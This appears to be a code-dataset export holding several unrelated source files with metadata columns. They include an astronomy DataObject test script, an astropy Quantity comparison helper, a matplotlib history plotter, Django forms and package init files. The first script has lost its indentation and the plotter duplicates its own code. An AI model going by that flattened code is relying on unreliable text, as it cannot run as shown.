data = DataObject(validfit, 'Zoomed',validsnr)
data.setZoomFactor(float(-0.1))
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidZoomFactorException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setZoomFactor with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits',validsnr)
data.setZoomFactor(float(1.0))
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getZoomFactor")
print("Test getZoomFactor with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'Zoomed',validsnr)
zoomFactorExp = float(2.5)
data.setZoomFactor(zoomFactorExp)
zoomFactorOut = data.getZoomFactor()
if(zoomFactorExp == zoomFactorOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(zoomFactorExp, zoomFactorOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getZoomFactor with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits',validsnr)
zoomFactor = data.getZoomFactor()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setZoomedImages")
print("Test setZoomedImages with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'Zoomed', validsnr)
zoomedObj = ZoomObject(image=plt.figure())
zoomedImgs = [zoomedObj]
data.setZoomedImages(zoomedImgs)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setZoomedImages with non-list input")
try:
tests = tests + 1
data = DataObject(validfit, 'Zoomed', validsnr)
data.setZoomedImages("Not a list")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error")
print(e)
failures = failures + 1
print("Test setZoomedImages with non-ZoomObject element in list")
try:
tests = tests + 1
data = DataObject(validfit, 'Zoomed', validsnr)
nonZoomList = []
nonZoomList.append(3)
data.setZoomedImages(nonZoomList)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setZoomedImages with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits', validsnr)
zoomedObj = ZoomObject(image=plt.figure())
zoomedImgs = [zoomedObj]
data.setZoomedImages(zoomedImgs)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getZoomedImages")
print("Test getZoomedImages with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'Zoomed', validsnr)
zoomedObj = ZoomObject(image=plt.figure())
zoomedImgsExp = [zoomedObj]
data.setZoomedImages(zoomedImgsExp)
zoomedImgsOut = data.getZoomedImages()
if(zoomedImgsExp == zoomedImgsOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(zoomedImgsExp, zoomedImgsOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getZoomedImages with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits', validsnr)
zoomedImgsOut = data.getZoomedImages()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
#Test Orbit functions
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setTle")
print("Test setTle with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits', validsnr)
data.setTle(validtle)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setTle with non-formatted tle")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits', validsnr)
data.setTle(blahtext)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except EmptyFileException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setTle with empty filename")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits', validsnr)
data.setTle("")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except EmptyFileException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setTle with wrong flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', validsnr)
data.setTle(validtle)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getTleData")
print("Test getTleData with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits', validsnr)
data.setTle(validtle)
tleDataOut = data.getTleData()
with open(validtle) as tle:
tleDataExp=tle.readlines()
if(tleDataExp == tleDataOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(tleDataExp, tleDataOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getTleData with wrong flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', validsnr)
data.getTleData()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getTleLength")
print("Test getTleData with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits', validsnr)
data.setTle(validtle)
tleLengthOut = data.getTleLength()
with open(validtle) as tle:
tleData = tle.readlines()
tleLengthExp=len(tleData)
if(tleLengthExp == tleLengthOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(tleLengthExp, tleLengthOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getTleData with wrong flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', validsnr)
data.getTleLength()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test setFits")
print("Test setFits with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits', validsnr)
data.setFits(validfits)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setFits with non-formatted fits")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits', validsnr)
data.setFits(emptytext)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except EmptyFileException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setFits with empty filename")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits', validsnr)
data.setFits("")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except EmptyFileException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setFits with wrong flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', validsnr)
data.setFits(validfits)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getWcsInfo")
print("Test getWcsInfo with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits', validsnr)
data.setFits(validfits)
wcsInfoOut = data.getWcsInfo()
wcsInfoExp = None
with fits.open(validfits):
wcsInfoExp = wcs.WCS(validfits)
wcsInfoExpStr = wcsInfoExp.to_header_string()
wcsInfoOutStr = wcsInfoOut.to_header_string()
if(wcsInfoExpStr == wcsInfoOutStr):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(wcsInfoExp, wcsInfoOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getWcsInfo with wrong flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', validsnr)
data.getWcsInfo()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test setOrbitPlot")
print("Test setOrbitPlot with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits',validsnr)
figure = plt.figure()
data.setOrbitPlot(figure)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setOrbitPlot with invalid type")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits',validsnr)
data.setOrbitPlot("Not a figure")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setOrbitPlot with incorrect flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot',validsnr)
figure = plt.figure()
data.setOrbitPlot(figure)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getOrbitPlot")
print("Test getOrbitPlot with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits',validsnr)
figureExp = plt.figure()
data.setOrbitPlot(figureExp)
figureOut = data.getOrbitPlot()
if(figureExp == figureOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(figureExp, figureOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getOrbitPlot with incorrect flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot',validsnr)
data.getOrbitPlot()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are finished testing
print("-----------------------")
print("Tests: {}".format(tests))
print("Successes: {}".format(successes))
print("Failures: {}".format(failures))
| 33.07739
| 138
| 0.65842
| 9,948
| 87,192
| 5.770507
| 0.042622
| 0.081108
| 0.085585
| 0.038045
| 0.83815
| 0.833638
| 0.827367
| 0.8131
| 0.80385
| 0.793136
| 0
| 0.016667
| 0.225158
| 87,192
| 2,636
| 139
| 33.07739
| 0.833023
| 0.047516
| 0
| 0.784338
| 0
| 0
| 0.293746
| 0.035139
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.00041
| 0.00574
| 0
| 0.00574
| 0.350964
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
afb42298d2af288829b104bf8680b1bf21d6be24
| 6,703
|
py
|
Python
|
utilipy/tests/helper/quantity_array.py
|
nstarman/utilipy
|
17984942145d31126724df23500bafba18fb7516
|
[
"BSD-3-Clause"
] | 2
|
2020-11-15T01:48:45.000Z
|
2020-12-02T20:44:20.000Z
|
utilipy/tests/helper/quantity_array.py
|
nstarman/astroPHD
|
17984942145d31126724df23500bafba18fb7516
|
[
"BSD-3-Clause"
] | 22
|
2020-09-13T17:58:24.000Z
|
2022-02-04T19:05:23.000Z
|
utilipy/tests/helper/quantity_array.py
|
nstarman/utilipy
|
17984942145d31126724df23500bafba18fb7516
|
[
"BSD-3-Clause"
] | 1
|
2020-04-21T22:41:01.000Z
|
2020-04-21T22:41:01.000Z
|
# -*- coding: utf-8 -*-
"""PDB and close-to-zero safe element-wise |Quantity| array comparisons.
The Astropy funciton :func:`~astropy.tests.helper.quantity_allclose` has
a few shortcomings:
- It fails if the argument `a` and `b` are/close to zero
- pdb diagnostics when the units don't match are really hard
"""
__all__ = [
"eltwise_quantity_isclose",
"eltwise_quantity_allclose",
"eltwise_assert_quantity_isclose",
"eltwise_assert_quantity_allclose",
]
##############################################################################
# IMPORTS
# BUILT-IN
import typing as T
from itertools import zip_longest
# THIRD PARTY
import astropy.units as u
import numpy as np
from astropy.units.quantity import (
_unquantify_allclose_arguments as _unquantify,
)
##############################################################################
# PARAMETERS
QuantityType = T.TypeVar("QuantityType", bound=u.Quantity)
##############################################################################
# CODE
##############################################################################
# TODO support argument kwargs
def eltwise_quantity_isclose(
a,
b,
rtol=1e-15,
atol=None,
equal_nan=False,
wrap: T.Union[None, T.Tuple[int, QuantityType]] = None,
):
"""Returns True if two arrays are element-wise equal within a tolerance.
This is a |Quantity|-aware version of :func:`~numpy.allclose`,
modified from :mod:`~astropy` to be easier for PDB debugging.
.. warning::
This function should only be used when setting up testing.
Use :func:`~astropy.units.allclose` or
:func:`~astropy.tests.helper.quantity_allclose`.
Parameters
----------
wrap : T.Tuple[int, QuantityType], optional
"""
# Splitting the comparison into a for-loop allows for element-wise
# comparisons and prevents dropping into sub-functions so we stay in this
# namespace when in PDB.
try:
alen = len(a)
except TypeError: # scalar
a = [a]
alen = 1
try:
blen = len(b)
except TypeError: # scalar
b = [b]
blen = 1
assert alen == blen
try:
len(rtol)
except TypeError: # scalar
rtol = np.broadcast_to(rtol, blen, subok=True)
try:
len(atol)
except TypeError: # scalar
atol = np.broadcast_to(atol, blen, subok=True)
wrap = wrap if wrap is not None else [wrap]
close = []
for x, y, rt, at, wrp in zip_longest(a, b, rtol, atol, wrap):
if wrp is not None: # adjust to phase-wrap
x = np.divmod(x, wrp)[1] # the "remainder"
y = np.divmod(y, wrp)[1]
try:
x, y, _rt, _at = _unquantify(x, y, rt, at)
except u.UnitsError as e:
raise u.UnitsError(e)
compare = u.isclose(x, y, rtol=_rt, atol=_at, equal_nan=equal_nan)
close.append(compare)
return np.array(close)
# /def
# -------------------------------------------------------------------
# TODO support argument kwargs
def eltwise_quantity_allclose(
a,
b,
rtol=1e-15,
atol=None,
equal_nan=False,
wrap: T.Union[None, T.Tuple[int, QuantityType]] = None,
):
"""Returns True if two arrays are element-wise equal within a tolerance.
This is a |Quantity|-aware version of :func:`~numpy.allclose`,
modified from :mod:`~astropy` to be easier for PDB debugging.
.. warning::
This function should only be used when setting up testing.
Use :func:`~astropy.units.allclose` or
:func:`~astropy.tests.helper.quantity_allclose`.
"""
return np.all(
eltwise_quantity_isclose(
a, b, rtol=rtol, atol=atol, equal_nan=equal_nan, wrap=wrap
)
)
# /def
# -------------------------------------------------------------------
# TODO support argument kwargs
def eltwise_assert_quantity_isclose(
a,
b,
rtol=1e-15,
atol=None,
equal_nan=False,
wrap: T.Union[None, T.Tuple[int, QuantityType]] = None,
):
"""Returns True if two arrays are element-wise equal within a tolerance.
This is a |Quantity|-aware version of :func:`~numpy.allclose`,
modified from :mod:`~astropy` to be easier for PDB debugging.
.. warning::
This function should only be used when setting up testing.
Use :func:`~astropy.units.allclose` or
:func:`~astropy.tests.helper.quantity_allclose`.
"""
# Splitting the comparison into a for-loop allows for element-wise
# comparisons and prevents dropping into sub-functions so we stay in this
# namespace when in PDB.
try:
alen = len(a)
except TypeError: # scalar
a = [a]
alen = 1
try:
blen = len(b)
except TypeError:
b = [b]
blen = 1
assert alen == blen
try:
len(rtol)
except TypeError: # scalar
rtol = np.broadcast_to(rtol, blen, subok=True)
try:
len(atol)
except TypeError: # scalar
atol = np.broadcast_to(atol, blen, subok=True)
wrap = wrap if wrap is not None else [wrap]
for x, y, rt, at, wrp in zip_longest(a, b, rtol, atol, wrap):
if wrp is not None: # adjust to phase-wrap
x = np.divmod(x, wrp)[1] # the "remainder"
y = np.divmod(y, wrp)[1]
try:
x, y, _rt, _at = _unquantify(x, y, rt, at)
except u.UnitsError as e:
raise u.UnitsError(e)
assert u.isclose(
x, y, rtol=_rt, atol=_at, equal_nan=equal_nan
), f"{x}, {y} | {_rt}, {_at}"
# /def
# -------------------------------------------------------------------
# TODO support argument kwargs
def eltwise_assert_quantity_allclose(
a,
b,
rtol=1e-15,
atol=None,
equal_nan=False,
wrap: T.Union[None, T.Tuple[int, QuantityType]] = None,
):
"""Raise an assertion if two objects are not equal up to desired tolerance.
This is a :class:`~astropy.units.Quantity`-aware version of
:func:`numpy.testing.assert_allclose`,
modified from :mod:`~astropy` to be easier for PDB debugging.
.. warning::
This function should only be used when setting up testing.
Use :func:`~astropy.tests.helper.assert_quantity_allclose`.
"""
# Splitting the comparison into a for-loop allows for element-wise
# comparisons and prevents dropping into sub-functions so we stay in this
# namespace when in PDB.
return eltwise_assert_quantity_isclose(
a, b, rtol=rtol, atol=atol, equal_nan=equal_nan, wrap=wrap
)
# /def
##############################################################################
# END
| 25.583969
| 79
| 0.569148
| 841
| 6,703
| 4.451843
| 0.185493
| 0.025641
| 0.012821
| 0.011218
| 0.794071
| 0.794071
| 0.773771
| 0.750801
| 0.750801
| 0.728098
| 0
| 0.00415
| 0.245114
| 6,703
| 261
| 80
| 25.681992
| 0.735771
| 0.426525
| 0
| 0.735043
| 0
| 0
| 0.045134
| 0.034387
| 0
| 0
| 0
| 0.015326
| 0.068376
| 1
| 0.034188
| false
| 0
| 0.042735
| 0
| 0.102564
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bbabb1d694252d23f2778f7148870c38e2bf8cfc
| 110
|
py
|
Python
|
tests/unit/test_public_imports.py
|
peajayni/pgevents
|
546f9f37a2f92717a409fdf811e657dbd6886746
|
[
"MIT"
] | 1
|
2021-12-23T23:07:55.000Z
|
2021-12-23T23:07:55.000Z
|
tests/unit/test_public_imports.py
|
peajayni/pgevents
|
546f9f37a2f92717a409fdf811e657dbd6886746
|
[
"MIT"
] | null | null | null |
tests/unit/test_public_imports.py
|
peajayni/pgevents
|
546f9f37a2f92717a409fdf811e657dbd6886746
|
[
"MIT"
] | null | null | null |
def test_import_app():
from pgevents import App
def test_import_event():
from pgevents import Event
| 15.714286
| 30
| 0.745455
| 16
| 110
| 4.875
| 0.4375
| 0.179487
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 110
| 6
| 31
| 18.333333
| 0.886364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 1
| 0
| 1.5
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bbc253b4a2ee2c6681aaee5ae778e9d002a43900
| 1,379
|
py
|
Python
|
src/plot.py
|
JohannesAnd/TDT4265-Face
|
1ff778103818c618fd3df457a6a5e667f95ce0c9
|
[
"MIT"
] | null | null | null |
src/plot.py
|
JohannesAnd/TDT4265-Face
|
1ff778103818c618fd3df457a6a5e667f95ce0c9
|
[
"MIT"
] | null | null | null |
src/plot.py
|
JohannesAnd/TDT4265-Face
|
1ff778103818c618fd3df457a6a5e667f95ce0c9
|
[
"MIT"
] | null | null | null |
from matplotlib import pyplot as plt
def plot_training_score(history):
plt.figure()
plt.title("loss")
plt.xlabel("epochs")
plt.ylabel("loss")
plt.plot([num for num in range(1, len(history.history['loss'])+1)],
history.history['loss'])
plt.axis([1, 10, min(history.history['loss']),
max(history.history['loss'])])
plt.figure()
plt.title("Accuracy")
plt.xlabel("epochs")
plt.ylabel("acc")
plt.plot([num for num in range(1, len(history.history['acc'])+1)],
history.history['acc'])
plt.axis([1, 10, min(history.history['acc']), max(history.history['acc'])])
#print('Availible variables to plot: {}'.format(history.history.keys()))
plt.figure()
plt.title("loss")
plt.xlabel("epochs")
plt.ylabel("loss")
plt.plot([num for num in range(1, len(history.history['loss'])+1)],
history.history['loss'])
plt.axis([1, 10, min(history.history['loss']),
max(history.history['loss'])])
plt.figure()
plt.title("Accuracy")
plt.xlabel("epochs")
plt.ylabel("acc")
plt.plot([num for num in range(1, len(history.history['acc'])+1)],
history.history['acc'])
plt.axis([1, 10, min(history.history['acc']), max(history.history['acc'])])
plt.show()
# TODO: Visulize the plot, to be applied after traing is complete
| 32.833333
| 79
| 0.60116
| 189
| 1,379
| 4.375661
| 0.238095
| 0.287787
| 0.174123
| 0.082225
| 0.795647
| 0.795647
| 0.795647
| 0.795647
| 0.795647
| 0.795647
| 0
| 0.018165
| 0.201595
| 1,379
| 41
| 80
| 33.634146
| 0.73297
| 0.097897
| 0
| 0.909091
| 0
| 0
| 0.095008
| 0
| 0
| 0
| 0
| 0.02439
| 0
| 1
| 0.030303
| false
| 0
| 0.030303
| 0
| 0.060606
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bbe11e8e6a2a359ae04974a4a269713c92eb2efa
| 206
|
py
|
Python
|
half_tones/half_tones/__init__.py
|
giovaninppc/MC920
|
7d46238f4079dabc4769c72cbed44d024fcf5c97
|
[
"MIT"
] | 1
|
2019-08-23T19:23:18.000Z
|
2019-08-23T19:23:18.000Z
|
half_tones/half_tones/__init__.py
|
giovaninppc/MC920
|
7d46238f4079dabc4769c72cbed44d024fcf5c97
|
[
"MIT"
] | null | null | null |
half_tones/half_tones/__init__.py
|
giovaninppc/MC920
|
7d46238f4079dabc4769c72cbed44d024fcf5c97
|
[
"MIT"
] | 1
|
2020-11-05T23:56:49.000Z
|
2020-11-05T23:56:49.000Z
|
from half_tones.floyd_steinberg import *
from half_tones.stevenson_arce import *
from half_tones.burkes import *
from half_tones.sierra import *
from half_tones.stucki import *
from half_tones.jjn import *
| 29.428571
| 40
| 0.825243
| 32
| 206
| 5.0625
| 0.375
| 0.296296
| 0.481481
| 0.58642
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116505
| 206
| 6
| 41
| 34.333333
| 0.89011
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a52290a7cd76046a90a7e381b1f8ba67369e7895
| 1,293
|
py
|
Python
|
myblog/forms.py
|
gokul-h/blog
|
d0206491b2b2e20f202a1fcaedd99b7cc1e7af5d
|
[
"MIT"
] | 1
|
2021-05-21T11:54:48.000Z
|
2021-05-21T11:54:48.000Z
|
myblog/forms.py
|
gokul-h/blog
|
d0206491b2b2e20f202a1fcaedd99b7cc1e7af5d
|
[
"MIT"
] | null | null | null |
myblog/forms.py
|
gokul-h/blog
|
d0206491b2b2e20f202a1fcaedd99b7cc1e7af5d
|
[
"MIT"
] | null | null | null |
from django import forms
from .models import Post
class Postform(forms.ModelForm):
class Meta:
model = Post
fields = ('title', 'title_tag', 'author', 'body', 'snippet')
widgets = {
'title': forms.TextInput(attrs={'class': 'form-control'}),
'title_tag': forms.TextInput(
attrs={'class': 'form-control', 'placeholder': "This appear on the tab of your browser"}),
'author': forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'username', 'value': '', 'id': 'gokul',
'type': 'hidden'}),
'body': forms.Textarea(attrs={'class': 'form-control'}),
'snippet': forms.Textarea(attrs={'class': 'form-control'}),
}
class Editform(forms.ModelForm):
class Meta:
model = Post
fields = ('title', 'title_tag', 'body', 'snippet')
widgets = {
'title': forms.TextInput(attrs={'class': 'form-control'}),
'title_tag': forms.TextInput(
attrs={'class': 'form-control', 'placeholder': "This appear on the tab of your browser"}),
'body': forms.Textarea(attrs={'class': 'form-control'}),
'snippet': forms.Textarea(attrs={'class': 'form-control'}),
}
| 35.916667
| 106
| 0.545244
| 129
| 1,293
| 5.434109
| 0.302326
| 0.128388
| 0.179743
| 0.269615
| 0.844508
| 0.844508
| 0.844508
| 0.778887
| 0.778887
| 0.778887
| 0
| 0
| 0.276875
| 1,293
| 35
| 107
| 36.942857
| 0.749733
| 0
| 0
| 0.592593
| 0
| 0
| 0.312452
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.074074
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a53a4faa5e8d2d41240ac190978d78b2d6d25f26
| 196
|
py
|
Python
|
mlrose_hiive/samples/__init__.py
|
sareini/mlrose
|
b5ebaac322cb063ad4611367c43e1827bda0eb95
|
[
"BSD-3-Clause"
] | 63
|
2019-09-24T14:09:51.000Z
|
2022-03-09T02:36:25.000Z
|
mlrose_hiive/samples/__init__.py
|
sareini/mlrose
|
b5ebaac322cb063ad4611367c43e1827bda0eb95
|
[
"BSD-3-Clause"
] | 6
|
2019-10-04T01:04:21.000Z
|
2021-08-31T19:06:13.000Z
|
mlrose_hiive/samples/__init__.py
|
sareini/mlrose
|
b5ebaac322cb063ad4611367c43e1827bda0eb95
|
[
"BSD-3-Clause"
] | 104
|
2019-09-23T22:44:43.000Z
|
2022-03-13T18:50:53.000Z
|
""" Classes for running optimization problems."""
# Author: Andrew Rollings
# License: BSD 3 clause
from .synthetic_data import SyntheticData
from .synthetic_data import (plot_synthetic_dataset)
| 28
| 52
| 0.80102
| 24
| 196
| 6.375
| 0.791667
| 0.169935
| 0.222222
| 0.300654
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005814
| 0.122449
| 196
| 7
| 52
| 28
| 0.883721
| 0.454082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a57deae5ef20955ae774f8a3e31f212a562a72b4
| 23,108
|
py
|
Python
|
src/hedera_proto/crypto_service_pb2_grpc.py
|
HbarStudio/hedera-protobufs-python
|
f8a503d2c4c5b7c441ddf48607f7ee563b3f931a
|
[
"Apache-2.0"
] | null | null | null |
src/hedera_proto/crypto_service_pb2_grpc.py
|
HbarStudio/hedera-protobufs-python
|
f8a503d2c4c5b7c441ddf48607f7ee563b3f931a
|
[
"Apache-2.0"
] | null | null | null |
src/hedera_proto/crypto_service_pb2_grpc.py
|
HbarStudio/hedera-protobufs-python
|
f8a503d2c4c5b7c441ddf48607f7ee563b3f931a
|
[
"Apache-2.0"
] | null | null | null |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
import query_pb2 as query__pb2
import response_pb2 as response__pb2
import transaction_pb2 as transaction__pb2
